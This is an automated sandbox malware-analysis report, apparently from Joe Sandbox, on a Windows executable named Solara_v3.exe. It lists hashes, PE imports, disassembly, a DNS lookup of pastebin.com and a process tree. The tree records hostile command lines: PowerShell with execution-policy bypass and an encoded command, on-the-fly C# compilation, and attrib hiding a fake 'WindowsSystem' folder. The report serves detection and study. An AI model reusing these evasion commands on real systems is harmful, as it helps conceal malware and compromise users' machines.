                                                                                                                                                  MD5:404f9a9a90f2729d0acba7e76527fb88
                                                                                                                                                  SHA1:441a37963638e3f4635ef8c5fa35fd8fa566e325
                                                                                                                                                  SHA256:96559ba94a96b7a3ab66125a3556c6a8ec07fe561f8d60bd06f66520e3366c5e
                                                                                                                                                  SHA512:e226e8434b4252656f1eb4d3441e1f26b5f2de2532965816749d8cb24702dcf5eaef45c7bdccad7dadf8e6f1d4b7cf70168c399db13aed4f7e162f5b98a73ccc
                                                                                                                                                  SSDEEP:196608:dwbXq+vjOYt6zbQiA+XjQkDek5Ud5DDHINwd3cxGUe1CQOxg2FfNtmojn5M/qZVR:dwbXtp6zbbA+X8f8U4P22FXmDqZD
                                                                                                                                                  TLSH:8F777C03BA8718A9D09DC474834746A38A613CDB1B3AB9FF55C536252F7EAF05B3A314
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y5.h.T.;.T.;.T.;.?.:;T.;.?.:.T.;.?.:.T.;...;.T.;.%.:,T.;.%.:.T.;.%.:.T.;.?.:.T.;.T.;.T.;.&.:.T.;.T.;.V.;.&.:.T.;.&&;.T.;.&.:.T.
                                                                                                                                                  Icon Hash:f0e1f4f0d0e972c7
                                                                                                                                                  Entrypoint:0x141515470
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5FE21E27 [Tue Dec 22 16:26:15 2020 UTC]
                                                                                                                                                  TLS Callbacks:0x4084df90, 0x1
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:6
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:6
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:c650cbf7c8459f7bd0ae3aba556dd87e
                                                                                                                                                  Instruction
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  call 00007FC330B2AF68h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  jmp 00007FC330B2A7C7h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  dec ebp
                                                                                                                                                  mov eax, dword ptr [ecx+38h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  call 00007FC330B2A962h
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  ret
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  inc ebp
                                                                                                                                                  mov ebx, dword ptr [eax]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ebx, edx
                                                                                                                                                  inc ecx
                                                                                                                                                  and ebx, FFFFFFF8h
                                                                                                                                                  dec esp
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  inc ecx
                                                                                                                                                  test byte ptr [eax], 00000004h
                                                                                                                                                  dec esp
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  je 00007FC330B2A965h
                                                                                                                                                  inc ecx
                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                  dec ebp
                                                                                                                                                  arpl word ptr [eax+04h], dx
                                                                                                                                                  neg eax
                                                                                                                                                  dec esp
                                                                                                                                                  add edx, ecx
                                                                                                                                                  dec eax
                                                                                                                                                  arpl ax, cx
                                                                                                                                                  dec esp
                                                                                                                                                  and edx, ecx
                                                                                                                                                  dec ecx
                                                                                                                                                  arpl bx, ax
                                                                                                                                                  dec edx
                                                                                                                                                  mov edx, dword ptr [eax+edx]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+10h]
                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+08h]
                                                                                                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                  je 00007FC330B2A95Dh
                                                                                                                                                  movzx eax, byte ptr [ecx+eax+03h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1f3c150 | 0x68 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f3c1b8 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2040000 | 0x1344 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1f6e000 | 0xd0ba8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2042000 | 0x1d200 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1d5dfc8 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1d5e180 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1d5e020 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1545000 | 0x758 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1543da0 | 0x1543e00 | 561ec8cdb94bb288e7f0eedac0f2e72e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1545000 | 0x9f8aa4 | 0x9f8c00 | ba7d6f1ae288dc90398ffb2b6b537deb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1f3e000 | 0x2fa50 | 0x11e00 | a8e709bffb0721c66ce8eb25a2bf4343 | False | 0.1423322770979021 | data | 2.7861489985627568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1f6e000 | 0xd0ba8 | 0xd0c00 | 5a8e05bb68b8e430fbc10cb058074aab | False | 0.4521484375 | data | 6.886282734270313 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x203f000 | 0x94 | 0x200 | 6e8350ec68cdfae634cb4cde29b6c60b | False | 0.212890625 | data | 1.7840059761324978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2040000 | 0x1344 | 0x1b400 | 243cc2b926463e2fbec8a34fc7ea356a | False | 0.03148294151376147 | data | 3.1282785025523854 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2042000 | 0x1d200 | 0x1d200 | 4b12143aec5621b637328376ad463948 | False | 0.20516195010729613 | data | 5.478933361641409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2040100 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.6564258911819888
RT_GROUP_ICON | 0x20400e8 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x20411a8 | 0x19c | data | English | United States | 0.5995145631067961
DLL | Import
WS2_32.dll | listen, WSAGetLastError, closesocket, WSASendTo, WSARecvFrom, WSAGetOverlappedResult, setsockopt, WSASend, getsockopt, WSAIoctl, WSASocketW, WSARecv, getaddrinfo, getpeername, shutdown, recv, ioctlsocket, getsockname, WSACleanup, WSAStartup, freeaddrinfo, bind
KERNEL32.dll | GetOEMCP, GetACP, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, HeapSize, GetFileSizeEx, GetConsoleOutputCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCommandLineA, SwitchToThread, SetConsoleMode, LeaveCriticalSection, CloseHandle, SetConsoleCursorPosition, lstrlenW, WaitForSingleObject, GetLastError, GetExitCodeProcess, GetCurrentProcessId, GetCommandLineW, GetProcessHeap, HeapFree, AddVectoredExceptionHandler, HeapAlloc, HeapReAlloc, GetStdHandle, GetFileInformationByHandleEx, GetConsoleMode, EnterCriticalSection, Sleep, CreateHardLinkW, DeviceIoControl, ReadFile, TerminateProcess, FreeLibrary, RegisterWaitForSingleObject, SetErrorMode, SetThreadErrorMode, LoadLibraryW, GetProcAddress, SetEnvironmentVariableW, GetConsoleScreenBufferInfo, GetProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, OpenProcess, SetCurrentDirectoryW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetFileTime, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, SetFileCompletionNotificationModes, CancelIoEx, WriteFile, GetOverlappedResult, CreateIoCompletionPort, SetHandleInformation, WaitForSingleObjectEx, CreateFileW, CreateSemaphoreW, ReadDirectoryChangesW, ReleaseSemaphore, CancelIo, GetSystemInfo, SetFileInformationByHandle, GetConsoleCursorInfo, SetConsoleCursorInfo, ReadConsoleInputW, FillConsoleOutputCharacterA, FillConsoleOutputAttribute, GetFileInformationByHandle, TlsGetValue, TlsSetValue, DeleteCriticalSection, GetModuleHandleW, SetLastError, GetEnvironmentVariableW, WriteConsoleW, InitializeCriticalSection, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, GetCurrentDirectoryW, LoadLibraryA, CreateMutexA, RtlLookupFunctionEntry, TlsAlloc, FormatMessageW, GetTempPathW, GetModuleFileNameW, FlushFileBuffers, DuplicateHandle, SetFilePointerEx, FindNextFileW, CreateDirectoryW, ReadConsoleW, TryEnterCriticalSection, FindFirstFileW, CreateProcessW, CreateNamedPipeW, CreateEventW, WaitForMultipleObjects, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, FindClose, DeleteFileW, MoveFileExW, RemoveDirectoryW, RtlUnwind, CopyFileExW, CreateThread, GetFinalPathNameByHandleW, UnregisterWaitEx, SetConsoleTextAttribute, GetSystemTimes, GlobalMemoryStatusEx, GetVersionExA, RtlVirtualUnwind, GetTimeZoneInformation, WideCharToMultiByte, GetThreadTimes, GetCurrentThreadId, DeleteFileA, GetTempPathA, GetTempFileNameA, GetFileType, OutputDebugStringA, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, IsDebuggerPresent, TlsFree, QueryThreadCycleTime, GetThreadPriority, SetThreadPriority, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, TryAcquireSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, VirtualProtect, RtlAddFunctionTable, RtlDeleteFunctionTable, LoadLibraryExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceExecuteOnce, SetUnhandledExceptionFilter, RtlCaptureStackBackTrace, GetNativeSystemInfo, InitializeConditionVariable, OpenThread, SuspendThread, GetThreadContext, ResumeThread, CreateSemaphoreA, GetCPInfo, FindFirstFileExW, SetStdHandle, SetEndOfFile, ReleaseMutex, SetFileAttributesW, FreeLibraryAndExitThread, ExitThread, GetModuleHandleExW, EncodePointer, RtlUnwindEx, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetStartupInfoW, UnhandledExceptionFilter, InitializeSListHead, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount
ADVAPI32.dll | RegQueryValueExW, RegOpenKeyExW, SystemFunction036, RegCloseKey
dbghelp.dll | SymInitialize, SymGetSearchPathW, SymSetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, SymSetOptions, SymFromAddr, SymGetLineFromAddr64, StackWalk64
ole32.dll | CoTaskMemFree
SHELL32.dll | SHGetKnownFolderPath
WINMM.dll | timeGetTime
Name | Ordinal | Address
CrashForExceptionInNonABICompliantCodeRange | 1 | 0x140bba0c0
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 16:23:08.653222084 CET | 65041 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 16:23:08.660634995 CET | 53 | 65041 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 16:23:08.653222084 CET | 192.168.2.4 | 1.1.1.1 | 0x928a | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 16:23:08.660634995 CET | 1.1.1.1 | 192.168.2.4 | 0x928a | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 16:23:08.660634995 CET | 1.1.1.1 | 192.168.2.4 | 0x928a | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 16:23:08.660634995 CET | 1.1.1.1 | 192.168.2.4 | 0x928a | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 10:23:00
Start date: 07/01/2025
Path: C:\Users\user\Desktop\Solara_v3.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Solara_v3.exe"
Imagebase: 0x7ff6dcbc0000
File size: 33'921'780 bytes
MD5 hash: 404F9A9A90F2729D0ACBA7E76527FB88
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Rust
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:23:00
Start date: 07/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 10:23:01
Start date: 07/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 10:23:04
Start date: 07/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
Imagebase: 0x7ff621430000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 10:23:04
Start date: 07/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"
Imagebase: 0x7ff7f6150000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:23:07
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"attrib" +h C:\WindowsSystem
                                                                                                                                                  Imagebase:0x7ff786140000
                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:2.5%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:3
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 6964 7ffd9b7eb124 6965 7ffd9b7eb12d LoadLibraryExW 6964->6965 6967 7ffd9b7eb1dd 6965->6967

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: bc303e92b5cc09753bdba098eb88123a8c52db46d6085fb5de4d41bce6a8e491
                                                                                                                                                    • Instruction ID: bbb3860104ddf59f75c84423d129b3cdf4231378164feb83d444ed8ed01d3aa7
                                                                                                                                                    • Opcode Fuzzy Hash: bc303e92b5cc09753bdba098eb88123a8c52db46d6085fb5de4d41bce6a8e491
                                                                                                                                                    • Instruction Fuzzy Hash: A331B03190CB4C8FDB19DBA89849BE9BBF0EF55321F04826BD059C3261DB74A855CB91

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737746798.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b470efb948fa3da95a3990889f31d4d0c74e181f13dec5a083727f51033807af
                                                                                                                                                    • Instruction ID: b76c636d3ba5f80415af6653b063b4fff3641ec29b4850b9db6ae13fbc79a3cc
                                                                                                                                                    • Opcode Fuzzy Hash: b470efb948fa3da95a3990889f31d4d0c74e181f13dec5a083727f51033807af
                                                                                                                                                    • Instruction Fuzzy Hash: F2D13862A1FA9E0FE765DB7888755F97B91EF1A310B0900FED05DC70E3D918A905C781

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737746798.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 42767ec81c2d73bb8897f24dc1423be6fc138db209c39c25c844e1503ab37bee
                                                                                                                                                    • Instruction ID: 80470288715e2d840b8859a17261f632377ee355a10e7c4ea2cb59513cd5ed1b
                                                                                                                                                    • Opcode Fuzzy Hash: 42767ec81c2d73bb8897f24dc1423be6fc138db209c39c25c844e1503ab37bee
                                                                                                                                                    • Instruction Fuzzy Hash: 5D812822B0E7C90FE36A5BB858361A47FD1DF5A260B0901FFD089CB1E7DD4D68068742
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: f9a7ba4be07a5940c02f0e00a66c8e67b293aac892e3186242e5bd8877e32521
                                                                                                                                                    • Instruction ID: 066172f7985e5a55d8506612813e5cbae1335266908f7d90d98902538381954c
                                                                                                                                                    • Opcode Fuzzy Hash: f9a7ba4be07a5940c02f0e00a66c8e67b293aac892e3186242e5bd8877e32521
                                                                                                                                                    • Instruction Fuzzy Hash: 5642C330A1DB8D4FEB74DF588865BA877E0FF55300F0542B9D84DCB2B2DA74AA468781
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: 156bd7128c3ef944d81c0650e39f5f224e9ded3bed0a1032511b8dc5aa190d75
                                                                                                                                                    • Instruction ID: 89243ad56e1de6da40381b62d861ae2ea706adec8d78efd8f7c01e85b034883b
                                                                                                                                                    • Opcode Fuzzy Hash: 156bd7128c3ef944d81c0650e39f5f224e9ded3bed0a1032511b8dc5aa190d75
                                                                                                                                                    • Instruction Fuzzy Hash: 6A128F70A19B4E4FEBB8DF588865BA977E0FF58300F054279D84EC72B1DE34AA458781
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2e81aab597d30e5ea065f4ddfcd3e30b97d1f13d3780a94accf349bd42e0c130
                                                                                                                                                    • Instruction ID: 1b33ece6c69d3ca0e6e2af9723740a1dcb62a05b7a8a493527a1ab00d43bec6e
                                                                                                                                                    • Opcode Fuzzy Hash: 2e81aab597d30e5ea065f4ddfcd3e30b97d1f13d3780a94accf349bd42e0c130
                                                                                                                                                    • Instruction Fuzzy Hash: BDC1E931B1DA0D4FEB68EB6D98656B937D2FFC8710F45017EE44DC32A6DE24A9028385